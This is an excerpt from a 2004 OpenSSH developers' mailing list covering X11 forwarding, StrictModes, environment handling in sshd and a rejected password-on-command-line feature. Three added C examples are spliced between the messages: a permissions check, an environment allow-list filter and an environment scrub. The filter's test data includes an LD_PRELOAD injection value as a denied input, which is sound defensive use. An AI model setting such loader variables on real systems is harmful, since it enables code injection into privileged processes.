> > It's just safer since you never know
> > what variables could be used for an exploit later.
>
> The environment variables in question are those inherited from root's
> environment at daemon startup, users don't get to fiddle with them.
>
> --
> Darren Tucker (dtucker at zip.com.au)
> GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
> Good judgement comes with experience. Unfortunately, the experience
> usually comes from bad judgement.
>

From cjwatson at debian.org Wed Mar 10 02:44:20 2004
From: cjwatson at debian.org (Colin Watson)
Date: Tue, 9 Mar 2004 15:44:20 +0000
Subject: ForwardX11Trusted
Message-ID: <20040309154420.GA2596@riva.ucam.org>

Since packaging OpenSSH 3.8p1 for Debian, I've got a flood of bug reports and confusion about the new untrusted X client configuration.

At least part of this seems to be the short (2 minutes!) timeout on the cookie, so that if you're impatient like me and open a connection to a machine that takes a little while to do the key exchange, go off and do something in another window in the meantime, and then come back when it's finished, you may well find that the untrusted cookie's expired in the meantime. This seems a bit excessive.

Would anyone think I was crazy for defaulting to ForwardX11Trusted in our OpenSSH package for a while until this becomes more mature? At least then we don't regress.

--
Colin Watson [cjwatson at flatline.org.uk]

From v_t_m at seznam.cz Wed Mar 10 07:35:45 2004
From: v_t_m at seznam.cz (Václav Tomec)
Date: Tue, 09 Mar 2004 21:35:45 +0100 (CET)
Subject: New version of SecurID auth and AuthSelection available
Message-ID: <1311265.3384842-21969-89808324-1078864545@seznam.cz>

Hello all,

the new versions of AuthSelection and SecurID patches are available for OpenSSH 3.8p1. securid-1@ssh.com authentication was removed.

I've made the logging patch too, it is based on sftplogging patch with some modifications and mainly !! scp logging !! is added.

Look at: http://sweb.cz/v_t_m/

Vaclav

From djm at mindrot.org Wed Mar 10 07:57:19 2004
From: djm at mindrot.org (Damien Miller)
Date: Wed, 10 Mar 2004 07:57:19 +1100 (EST)
Subject: ForwardX11Trusted
In-Reply-To: <20040309154420.GA2596@riva.ucam.org>
References: <20040309154420.GA2596@riva.ucam.org>
Message-ID:

On Tue, 9 Mar 2004, Colin Watson wrote:

> Since packaging OpenSSH 3.8p1 for Debian, I've got a flood of bug
> reports and confusion about the new untrusted X client configuration.
>
> At least part of this seems to be the short (2 minutes!) timeout on the
> cookie, so that if you're impatient like me and open a connection to a
> machine that takes a little while to do the key exchange, go off and do
> something in another window in the meantime, and then come back when
> it's finished, you may well find that the untrusted cookie's expired in
> the meantime. This seems a bit excessive.

Markus is looking at this.

> Would anyone think I was crazy for defaulting to ForwardX11Trusted in
> our OpenSSH package for a while until this becomes more mature? At least
> then we don't regress.

Some of the maturing needs to happen in the X11 server libraries, toolkits and applications as well.

The X11 server libraries have fixed, but very coarse security policy for what actions an untrusted connection can perform. The toolkits and applications need to stop blindly assuming that every action is possible.

-d

From listguy at transientresearch.com Wed Mar 10 18:53:19 2004
From: listguy at transientresearch.com (JD Cole)
Date: Tue, 09 Mar 2004 23:53:19 -0800
Subject: MAN pages: authorized_keys
Message-ID: <404EC96F.5070901@transientresearch.com>

Howdy,

I would like to suggest a change in the ssh documentation for the use of authorized_keys. The man page states:

    This file is not highly sensitive, but the recommended permissions are
    read/write for the user, and not accessible by others.

I may be nitpicking, but it could be read that, while not recommended, it is possible to allow access to the authorized_keys file to other users. It seems that this is not the case as an authorized_keys file with group write permissions causes ssh to fall back on manual login.

How about:

    This file is not highly sensitive, but ssh requires that the file is
    only writable by the user.

Please correct me if I am mistaken,

JD

From dtucker at zip.com.au Wed Mar 10 18:41:48 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Wed, 10 Mar 2004 18:41:48 +1100
Subject: MAN pages: authorized_keys
In-Reply-To: <404EC96F.5070901@transientresearch.com>
References: <404EC96F.5070901@transientresearch.com>
Message-ID: <404EC6BC.6010908@zip.com.au>

JD Cole wrote:
> I would like to suggest a change in the ssh documentation for the use
> of authorized_keys. The man page states:
>
> This file is not highly sensitive, but the recommended permissions are
> read/write for the user, and not accessible by others.
>
> I may be nitpicking, but it could be read that, while not
> recommended, it is possible to allow access to the authorized_keys file
> to other users. It seems that this is not the case as an authorized_keys
> file with group write permissions causes ssh to fall back on manual login.

That actually depends on the setting of StrictModes in sshd_config.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From listguy at transientresearch.com Wed Mar 10 19:57:21 2004
From: listguy at transientresearch.com (JD Cole)
Date: Wed, 10 Mar 2004 00:57:21 -0800
Subject: MAN pages: authorized_keys
In-Reply-To: <404EC6BC.6010908@zip.com.au>
References: <404EC96F.5070901@transientresearch.com> <404EC6BC.6010908@zip.com.au>
Message-ID: <404ED871.6050608@transientresearch.com>

Does the StrictModes apply to all files in the user's directory, or just the ssh config files (normally .ssh/)? Just trying to figure out the scope of StrictModes....

JD

Darren Tucker wrote:

> JD Cole wrote:
>
>> I would like to suggest a change in the ssh documentation for the
>> use of authorized_keys. The man page states:
>>
>> This file is not highly sensitive, but the recommended permissions
>> are read/write for the user, and not accessible by others.
>>
>> I may be nitpicking, but it could be read that, while not
>> recommended, it is possible to allow access to the authorized_keys
>> file to other users. It seems that this is not the case as an
>> authorized_keys file with group write permissions causes ssh to fall
>> back on manual login.
>
> That actually depends on the setting of StrictModes in sshd_config.
>

From markus at openbsd.org Wed Mar 10 19:10:54 2004
From: markus at openbsd.org (Markus Friedl)
Date: Wed, 10 Mar 2004 09:10:54 +0100
Subject: ForwardX11Trusted
In-Reply-To: <20040309154420.GA2596@riva.ucam.org>
References: <20040309154420.GA2596@riva.ucam.org>
Message-ID: <20040310081054.GA13864@folly>

On Tue, Mar 09, 2004 at 03:44:20PM +0000, Colin Watson wrote:
> At least part of this seems to be the short (2 minutes!) timeout on the
> cookie, so that if you're impatient like me and open a connection to a

I've changed this to 20 minutes. 1 minute is the default in xauth, and 2 minutes would be appropriate for ssh -f host xapp style forwarding.

From dtucker at zip.com.au Wed Mar 10 19:45:07 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Wed, 10 Mar 2004 19:45:07 +1100
Subject: MAN pages: authorized_keys
In-Reply-To: <404ED871.6050608@transientresearch.com>
References: <404EC96F.5070901@transientresearch.com> <404EC6BC.6010908@zip.com.au> <404ED871.6050608@transientresearch.com>
Message-ID: <404ED593.5060309@zip.com.au>

JD Cole wrote:
> Does the StrictModes apply to all files in the user's directory, or just
> the ssh config files (normally .ssh/)? Just trying to figure out the
> scope of StrictModes....

StrictModes causes the SSH config files and their directory components up to and including the user's home directory to be checked. See secure_filename in auth.c.

For /home/dtucker/.ssh/authorized_keys, "authorized_keys", ".ssh" and "dtucker" would be checked, but no other files or directories.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From Sergio.Gelato at astro.su.se Wed Mar 10 21:40:02 2004
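The StrictModes walk described in the reply above (the file, then each directory up to and including the home directory), as an added C example that is not OpenSSH's secure_filename and not part of the original thread. The pass rule (owner is the user or root, no group or other write bit) and the names strict_path_check and component_ok are assumptions made for this example.

```c
#define _XOPEN_SOURCE 700   /* realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed rule: owned by the user or root, no group/other write bit. */
static int component_ok(const struct stat *st, uid_t uid)
{
    if (st->st_uid != 0 && st->st_uid != uid)
        return 0;
    return (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/*
 * Check `file` and every directory above it, up to and including `home`.
 * Returns 0 when all components pass, -1 otherwise; on failure `bad`
 * receives the path that failed.
 * A daemon that already holds the file open should fstat() that
 * descriptor for the first component instead of stat()ing the path.
 */
int strict_path_check(const char *file, const char *home, uid_t uid,
                      char *bad, size_t badlen)
{
    char path[PATH_MAX], homedir[PATH_MAX];
    struct stat st;
    char *slash;

    /* Canonicalise both so symlinks and ".." cannot hide a component. */
    if (realpath(file, path) == NULL) {
        snprintf(bad, badlen, "%s", file);
        return -1;
    }
    if (realpath(home, homedir) == NULL) {
        snprintf(bad, badlen, "%s", home);
        return -1;
    }
    for (;;) {
        if (stat(path, &st) != 0 || !component_ok(&st, uid)) {
            snprintf(bad, badlen, "%s", path);
            return -1;
        }
        /* Stop once the home directory (or "/") itself has been checked. */
        if (strcmp(path, homedir) == 0 || strcmp(path, "/") == 0)
            return 0;
        slash = strrchr(path, '/');
        if (slash == path)
            path[1] = '\0';     /* parent is the root directory */
        else
            *slash = '\0';      /* strip the last component */
    }
}

int main(int argc, char **argv)
{
    char bad[PATH_MAX];

    if (argc != 3) {
        fprintf(stderr, "usage: %s <authorized_keys> <home>\n", argv[0]);
        return 2;
    }
    if (strict_path_check(argv[1], argv[2], getuid(), bad, sizeof(bad)) != 0) {
        printf("bad ownership or modes: %s\n", bad);
        return 1;
    }
    printf("ok\n");
    return 0;
}
```

A file that lies outside the home directory is checked all the way up to "/", because the walk never meets the home directory.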
From: Sergio.Gelato at astro.su.se (Sergio Gelato)
Date: Wed, 10 Mar 2004 11:40:02 +0100
Subject: ForwardX11Trusted
In-Reply-To:
References: <20040309154420.GA2596@riva.ucam.org>
Message-ID: <20040310104001.GD1059@hanuman.astro.su.se>

* Damien Miller [2004-03-10 07:57:19 +1100]:
> On Tue, 9 Mar 2004, Colin Watson wrote:
> > Since packaging OpenSSH 3.8p1 for Debian,

Nice. I did my own private packaging (targeting woody) and should probably compare with yours.

> > Would anyone think I was crazy for defaulting to ForwardX11Trusted in
> > our OpenSSH package for a while until this becomes more mature? At least
> > then we don't regress.

I've come to the same conclusion for my site: we need ForwardX11Trusted on by default, to keep users from putting it in their own .ssh/config files (or shell aliases; real users tend to be more familiar with shell aliases than with .ssh/config) where we can't easily turn it back off once the problems are solved.

> Some of the maturing needs to happen in the X11 server libraries,
> toolkits and applications as well.
>
> The X11 server libraries have fixed, but very coarse security policy

Actually, the security policy is configurable. It's just that the default configuration needs shaking up a bit to make it work well with a number of applications. We've seen problems with gv and (intermittently) with xterm. Also with PyRAF (i.e. in all likelihood with Python's Tkinter module).

> for what actions an untrusted connection can perform. The toolkits and
> applications need to stop blindly assuming that every action is possible.
>
> -d
>

From l45wang at shoshin.uwaterloo.ca Thu Mar 11 05:49:05 2004
From: l45wang at shoshin.uwaterloo.ca (Lixiao Wang)
Date: Wed, 10 Mar 2004 13:49:05 -0500
Subject: a quick help
Message-ID: <004c01c406d0$5d010a50$0d696181@boyne>

Dear Sir/Madam,

I am a Ph.D. student in Computer Science of the University of Waterloo, Canada. I'm currently taking a graduate level course, software architecture, offered by Dr. Ric Holt. Our group is interested in OpenSSH and we are studying the evolution of OpenSSH. I'm wondering if it is possible that you can provide us with some architectural information of OpenSSH, such as the design architecture, how many high-level components in the system and what are they, etc. It'll be great help on our project. Your warm-hearted help is highly appreciated.

Thanks again for your time,

Best Regards,
Lixiao Wang

From stuge-openssh-unix-dev at cdy.org Thu Mar 11 06:02:30 2004
From: stuge-openssh-unix-dev at cdy.org (Peter Stuge)
Date: Wed, 10 Mar 2004 20:02:30 +0100
Subject: a quick help
In-Reply-To: <004c01c406d0$5d010a50$0d696181@boyne>
References: <004c01c406d0$5d010a50$0d696181@boyne>
Message-ID: <20040310190230.GE7467@foo.birdnet.se>

On Wed, Mar 10, 2004 at 01:49:05PM -0500, Lixiao Wang wrote:
> I'm currently taking a graduate level course, software architecture,
> offered by Dr. Ric Holt. Our group is interested in OpenSSH and we
> are studying the evolution of OpenSSH. I'm wondering if it is possible
> that you can provide us with some architectural information of OpenSSH,
> such as the design architecture, how many high-level components in the
> system and what are they, etc.

Yes, it's possible, but it's not very likely. Use the source.

//Peter

From mouring at etoh.eviladmin.org Thu Mar 11 06:47:02 2004
From: mouring at etoh.eviladmin.org (Ben Lindstrom)
Date: Wed, 10 Mar 2004 13:47:02 -0600 (CST)
Subject: a quick help
In-Reply-To: <20040310190230.GE7467@foo.birdnet.se>
Message-ID:

On Wed, 10 Mar 2004, Peter Stuge wrote:

> On Wed, Mar 10, 2004 at 01:49:05PM -0500, Lixiao Wang wrote:
> > I'm currently taking a graduate level course, software architecture,
> > offered by Dr. Ric Holt. Our group is interested in OpenSSH and we
> > are studying the evolution of OpenSSH. I'm wondering if it is possible
> > that you can provide us with some architectural information of OpenSSH,
> > such as the design architecture, how many high-level components in the
> > system and what are they, etc.
>
> Yes, it's possible, but it's not very likely. Use the source.
>

I would say look in the *.tar.gz file for:

OVERVIEW
RFC.nroff

Along with the RFC on the secsh (which I don't have a link of off hand).

and the following for the privilege separation aspects:

http://niels.xtdnet.nl/ssh/privsep.html
http://niels.xtdnet.nl/papers/privsep.pdf

Would love to get my hands on Unisys' old "Re-engineering" program that drew pretty diagrams and translated the code base into a nice meta language, but I doubt anyone would give me it since it is.. oh.. A few million dollar program.

Not saying it would be useful, but would be fun to see.

- Ben

From dtucker at zip.com.au Thu Mar 11 10:13:07 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Thu, 11 Mar 2004 10:13:07 +1100
Subject: a quick help
In-Reply-To:
References:
Message-ID: <404FA103.6030109@zip.com.au>

Ben Lindstrom wrote:
> Along with the RFC on the secsh (which I don't have a link of off hand).

http://www.ietf.org/html.charters/secsh-charter.html

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From djm at mindrot.org Thu Mar 11 10:38:32 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 11 Mar 2004 10:38:32 +1100
Subject: a quick help
In-Reply-To: <004c01c406d0$5d010a50$0d696181@boyne>
References: <004c01c406d0$5d010a50$0d696181@boyne>
Message-ID: <404FA6F8.4040308@mindrot.org>

Lixiao Wang wrote:
> Dear Sir/Madam,
>
> I am a Ph.D. student in Computer Science of the University of Waterloo,
> Canada. I'm currently taking a graduate level course, software architecture,
> offered by Dr. Ric Holt. Our group is interested in OpenSSH and we are
> studying the evolution of OpenSSH. I'm wondering if it is possible that you
> can provide us with some architectural information of OpenSSH, such as the
> design architecture, how many high-level components in the system and what
> are they, etc. It'll be great help on our project. Your warm-hearted help is
> highly appreciated.

There is no high-level design documentation other than the protocol description in the IETF secsh internet-draft. Like many free software products, OpenSSH has evolved based on activities predominantly performed by individuals (mainly Markus).

As far as architectural components, they are pretty much separated by file. Some of the more important ones in ssh & sshd are:

- The logging routines
- The buffer code, implementing dynamic buffers which are used extensively through OpenSSH
- The generic cipher/MAC code
- The packet code, used to build/parse packets to/from the wire
- The dispatch system, that implements a generic message handler
- The client/server loops (the main loop of both ssh and sshd)
- The authentication method system
- The KEX (key exchange) code
- The channels code, used for sessions and port-forwarding (a state-machine lives here)
- The privsep architecture, best documented in Niels' paper (another state-machine is used here)
- The session code, which handles shell/command session setup and teardown

Because the protocol is the same, much code is reused between the client and the server.

I may have missed a couple of bits, but this is the guts of ssh and sshd. Most of these live in files with names similar to their functions.

What is the nature of your project? Would you be willing to share the results when you are done?

Regards,
Damien Miller

From djm at mindrot.org Thu Mar 11 11:49:04 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 11 Mar 2004 11:49:04 +1100
Subject: Test
Message-ID: <404FB780.1010607@mindrot.org>

Testing some more anti-spam measures. Please ignore.

-d

From djm at mindrot.org Thu Mar 11 11:50:12 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 11 Mar 2004 11:50:12 +1100
Subject: Testing again
Message-ID: <404FB7C4.5090402@mindrot.org>

Apologies

From djm at mindrot.org Thu Mar 11 13:19:43 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 11 Mar 2004 13:19:43 +1100
Subject: environ problem in 3.8p1
In-Reply-To:
References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au>
Message-ID: <404FCCBF.8040402@mindrot.org>

Petr Ostadal wrote:
> Is there any safe way to forward LANG and LC_* environ variables from client
> to remote? I have a problem with utf8<->not utf8 terminals ;(.

No, the protocol does not include a way to transmit more than the terminal type ($TERM).

Changing SSH protocol 1 is out of the question, but perhaps another version of "pty-req" that transfers environment variables could be possible. I doubt that this would happen soon.

Doing this right would be tricky - the ability to set arbitrary environment variables would have security implications (e.g. setting LD_PRELOAD before a restricted shell is executed).

-d

From djm at mindrot.org Thu Mar 11 20:07:46 2004
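An allow-list filter for client-requested environment variables, following the "environ problem in 3.8p1" messages above (pass only what is needed, refuse names such as LD_PRELOAD). This is an added example, not OpenSSH code; the pattern list (LANG, LC_*), the function names and the sample request are constructed for illustration.

```c
#include <fnmatch.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical server policy: the client may set locale variables only. */
static const char *const allowed_patterns[] = { "LANG", "LC_*", NULL };

/* Constructed sample of what a client might ask the server to set. */
static const char *const sample_request[] = {
    "LANG=en_US.UTF-8",
    "LC_CTYPE=cs_CZ.ISO-8859-2",
    "LD_PRELOAD=/tmp/hook.so",        /* must never reach a restricted shell */
    "KRB5CCNAME=FILE:/tmp/krb5cc_0",
    "TZ=UTC",
    "LC_ALL",                         /* malformed: no '=' */
    "=x",                             /* malformed: empty name */
    NULL
};

/* Returns 1 if "NAME=value" may be passed to the session, 0 otherwise. */
int env_request_allowed(const char *assignment)
{
    char name[64];
    const char *eq = strchr(assignment, '=');
    size_t len, i;

    if (eq == NULL || eq == assignment)
        return 0;                     /* no '=' or empty name */
    len = (size_t)(eq - assignment);
    if (len >= sizeof(name))
        return 0;                     /* refuse rather than truncate */
    for (i = 0; i < len; i++) {
        char c = assignment[i];
        /* Names are restricted to A-Z, 0-9 and '_' before matching. */
        if (!((c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_'))
            return 0;
        name[i] = c;
    }
    name[len] = '\0';
    for (i = 0; allowed_patterns[i] != NULL; i++)
        if (fnmatch(allowed_patterns[i], name, 0) == 0)
            return 1;
    return 0;                         /* default deny */
}

/* Copies pointers to the accepted assignments; returns how many were kept. */
size_t filter_env(const char *const *requested, const char **accepted,
                  size_t max)
{
    size_t n = 0;

    for (; *requested != NULL && n < max; requested++)
        if (env_request_allowed(*requested))
            accepted[n++] = *requested;
    return n;
}

int main(void)
{
    const char *accepted[8];
    size_t i, n = filter_env(sample_request, accepted, 8);

    for (i = 0; i < n; i++)
        printf("accept %s\n", accepted[i]);
    return 0;
}
```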
From: djm at mindrot.org (Damien Miller)
Date: Thu, 11 Mar 2004 20:07:46 +1100 (EST)
Subject: environ problem in 3.8p1
In-Reply-To: <404FCCBF.8040402@mindrot.org>
References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> <404FCCBF.8040402@mindrot.org>
Message-ID:

In his ignorance, on Thu, 11 Mar 2004, Damien Miller mistakenly wrote:

> No, the protocol does not include a way to transmit more than the
> terminal type ($TERM).

Markus pointed out that I am wrong: protocol 2 has a request to pass environment variables, which we don't implement.

-d

From sfrost at snowman.net Fri Mar 12 05:12:45 2004
From: sfrost at snowman.net (Stephen Frost) Date: Thu, 11 Mar 2004 13:12:45 -0500 Subject: GSSAPI support in 3.8 ? In-Reply-To: References: <4043381F.4010305@zip.com.au> Message-ID: <20040311181245.GI7060@ns.snowman.net> * sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk) wrote: > I've now completed testing some minimal patches for backwards > compatibility. They're attached to this email. Please note that these > patches are made available purely for the purpose of simplifying the > migration path - new users should have no need for them. Instructions for > their use are at the beginning of the patch. Many thanks Simon. I'm looking into using this patch to provide a migration path for Debian users moving from the old ssh-krb5 package (which was ssh with your GSSAPI patches) to current ssh (3.8). Two quick questions- first, what are your feelings about the patch? Do you think it's stable/usable enough to be distributed widely? The default will be off with a note about how to turn it on to interoperate with other systems. Second, does the GSSAPI in 3.8 do everything your older GSSAPI patches did? From what I've seen it looks like they do but I'd like to make sure- server verification using Kerberos (external-keyx?), ticket forwarding, etc? Many thanks, Stephen From dtucker at zip.com.au Fri Mar 12 23:37:13 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 12 Mar 2004 23:37:13 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: <4051AEF9.7090702@zip.com.au> Roger Cornelius wrote: > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c and causes logins to occur in > GMT time. It also causes any sshd syslog messages to be written in GMT > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > all platforms. Am I missing something? I haven't seen it reported > before. That was an attempt to fix issues with certain authentication types on AIX, but it causes other problems, as you found. The change has been backed out, and an alternative fix for the AIX issues has been implemented. (Both will be in the next release, and are in the snapshots now). Thanks for the report. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From rac at tenzing.org Sat Mar 13 02:29:47 2004 
From: rac at tenzing.org (Roger Cornelius) Date: Fri, 12 Mar 2004 10:29:47 -0500 Subject: environ problem in 3.8p1 In-Reply-To: <4051AEF9.7090702@zip.com.au> References: <200403022129.i22LTW517908@tenzing.org> <4051AEF9.7090702@zip.com.au> Message-ID: <20040312152947.GC8135@tenzing.org> On Fri Mar 12 23:37, Darren Tucker wrote: > Roger Cornelius wrote: > > >3.8p1 added the following to main() in sshd.c: > > > >#ifndef HAVE_CYGWIN > > /* Clear environment */ > > environ[0] = NULL; > >#endif > > > >This breaks the getenv("TZ") in session.c and causes logins to occur in > >GMT time. It also causes any sshd syslog messages to be written in GMT > >time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > >all platforms. Am I missing something? I haven't seen it reported > >before. > > That was an attempt to fix issues with certain authentication types on > AIX, but it causes other problems, as you found. The change has been > backed out, and an alternative fix for the AIX issues has been > implemented. (Both will be in the next release, and are in the > snapshots now). > > Thanks for the report. No problem. Thank you, and all the ssh team, for continuing to develop openssh, and continuing to support SCO, despite their current litigation attempts. Roger
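An added illustration of the `environ[0] = NULL` behaviour reported in this thread, not code from OpenSSH or from any poster: truncating the environment also discards TZ, while an allowlist scrub keeps TZ and still drops loader variables such as LD_PRELOAD. The allowlist contents, the function names and the sample environment are assumptions constructed for this example; the thread does not say what the alternative fix was.

```c
/* Added example, not OpenSSH code. All names below are hypothetical. */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Assumption: the only variable this daemon needs from its parent. */
static const char *const keep_vars[] = { "TZ", NULL };

/* Writable copy of a constructed sample environment, so every scenario
 * starts from the same state. */
static char *env_buf[8];

static void load_sample_env(void)
{
    static char *const sample[] = {
        "PATH=/usr/bin:/bin",
        "TZ=Australia/Sydney",
        "LD_PRELOAD=/nonexistent/constructed.so",
        "TZX=decoy",    /* shares a prefix with TZ, must not be kept */
        NULL
    };
    size_t i;

    for (i = 0; sample[i] != NULL; i++)
        env_buf[i] = sample[i];
    env_buf[i] = NULL;
    environ = env_buf;
}

/* Exact-name match: "TZ=..." is kept, "TZX=..." is not. */
static int is_kept(const char *entry)
{
    size_t i;

    for (i = 0; keep_vars[i] != NULL; i++) {
        size_t n = strlen(keep_vars[i]);
        if (strncmp(entry, keep_vars[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* The change quoted in the thread: drop every variable. */
static void truncate_environment(void)
{
    if (environ != NULL)
        environ[0] = NULL;
}

/* Allowlist scrub: compact environ in place and return how many
 * entries remain. */
static int scrub_environment(void)
{
    char **src;
    int kept = 0;

    if (environ == NULL)
        return 0;
    for (src = environ; *src != NULL; src++)
        if (is_kept(*src))
            environ[kept++] = *src;
    environ[kept] = NULL;
    return kept;
}

/* Returns 1 if TZ is still visible after the wholesale clear, else 0. */
static int tz_survives_truncate(void)
{
    load_sample_env();
    truncate_environment();
    return getenv("TZ") != NULL;
}

/* Returns 1 if the scrub keeps TZ and drops everything else, else 0. */
static int scrub_keeps_only_tz(void)
{
    load_sample_env();
    if (scrub_environment() != 1)
        return 0;
    return getenv("TZ") != NULL
        && strcmp(getenv("TZ"), "Australia/Sydney") == 0
        && getenv("LD_PRELOAD") == NULL
        && getenv("PATH") == NULL
        && getenv("TZX") == NULL;
}

int main(void)
{
    printf("TZ visible after environ[0] = NULL: %d\n", tz_survives_truncate());
    printf("allowlist scrub keeps only TZ:      %d\n", scrub_keeps_only_tz());
    return 0;
}
```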
From dtucker at zip.com.au Sat Mar 13 08:57:10 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 13 Mar 2004 08:57:10 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <20040312152947.GC8135@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> <4051AEF9.7090702@zip.com.au> <20040312152947.GC8135@tenzing.org> Message-ID: <40523236.1010800@zip.com.au> Roger Cornelius wrote: > No problem. Thank you, and all the ssh team, for continuing to develop > openssh, and continuing to support SCO, despite their current litigation > attempts. The OpenSSH project goal [1] is "all operating systems should ship with support for the SSH". There's no exception for operating systems from litigant vendors. That said, I personally do not agree with their actions, and believe that they're doing even more of a disservice to their user base (ie customers!) than to the rest of the community. (Note to readers: This is not an invitation to flood openssh-unix-dev on this topic, anyone wishing to follow up should do so via private email.) [1] http://www.openssh.com/goals.html -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From martin at elxsi.de Mon Mar 15 03:55:13 2004
From: martin at elxsi.de (Martin Kluge) Date: Sun, 14 Mar 2004 17:55:13 +0100 Subject: Feature request Message-ID: <20040314165513.GB11417@elxsi.de> Hi, I have a small problem, I want to specify the SSH password via the command line: root at bla:~# ssh -dmypassword user at host I know this is insecure and normally it is better to use key based authentication to log into the remote system without specifying a password, but in my case, this is not a possibility. So would you accept a patch to add a new command line option (suggestion: -d) to specify a password directly on the command line? This option would of course only be enabled if the configure script has been called with a special option (--with-insecure-cl-pass for example). We also could use a ":" to separate the username and the password: root at bla:~# ssh -l user:password host Please reply off-list, because I'm not subscribed. Thank you, Martin Kluge -- Name : Martin Kluge email : martin at elxsi.info Phone : +49 160 1515182 Projects : http://www.aa-security.de GPG Key : http://www.elxsi.de/key.pub From stuge-openssh-unix-dev at cdy.org Mon Mar 15 04:48:35 2004
From: stuge-openssh-unix-dev at cdy.org (Peter Stuge) Date: Sun, 14 Mar 2004 18:48:35 +0100 Subject: Feature request In-Reply-To: <20040314165513.GB11417@elxsi.de> References: <20040314165513.GB11417@elxsi.de> Message-ID: <20040314174835.GA10974@foo.birdnet.se> On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > So would you accept a patch to add a new command line option > (suggestion: -d) to specify a password directly on the command line? This has been requested before but declined because it promotes insecure behavior. (Your system may be isolated, but all aren't and it's usually possible to see any arguments of all processes in the system.) I seem to remember discussion about accepting the password on a file descriptor however. Search the mailing list and bugzilla.mindrot.org. //Peter From martin at elxsi.de Mon Mar 15 05:23:54 2004 
From: martin at elxsi.de (Martin Kluge) Date: Sun, 14 Mar 2004 19:23:54 +0100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <20040314182354.GA26324@elxsi.de> Hi, On Sun, Mar 14, 2004 at 06:48:35PM +0100, Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > > So would you accept a patch to add a new command line option > > (suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) Well, of course. But: This feature can be enabled (disabled per default) at compile time, so I think, everyone who enables this feature knows what he's doing. > > I seem to remember discussion about accepting the password on a file > descriptor however. Search the mailing list and bugzilla.mindrot.org. This would be a possibility too, I'll have a look at it. Thank you, Martin > > > //Peter -- Name : Martin Kluge email : martin at elxsi.info Phone : +49 160 1515182 Projects : http://www.aa-security.de GPG Key : http://www.elxsi.de/key.pub From markus at openbsd.org Mon Mar 15 05:48:43 2004
From: markus at openbsd.org (Markus Friedl) Date: Sun, 14 Mar 2004 19:48:43 +0100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <20040314184842.GA29132@folly> On Sun, Mar 14, 2004 at 06:48:35PM +0100, Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > > So would you accept a patch to add a new command line option > > (suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) yes, but you can abuse SSH_ASKPASS for this. From openssh at roumenpetrov.info Mon Mar 15 23:10:06 2004 From: openssh at roumenpetrov.info (Roumen Petrov) Date: Mon, 15 Mar 2004 14:10:06 +0200 Subject: Feature request In-Reply-To: <20040314165513.GB11417@elxsi.de> References: <20040314165513.GB11417@elxsi.de> Message-ID: <40559D1E.10800@roumenpetrov.info> Hi Martin, check this: "http://expect.nist.gov/FAQ.html#q1" Martin Kluge wrote: >Hi, > >I have a small problem, I want to specify the SSH password via the command >line: > > >root at bla:~# ssh 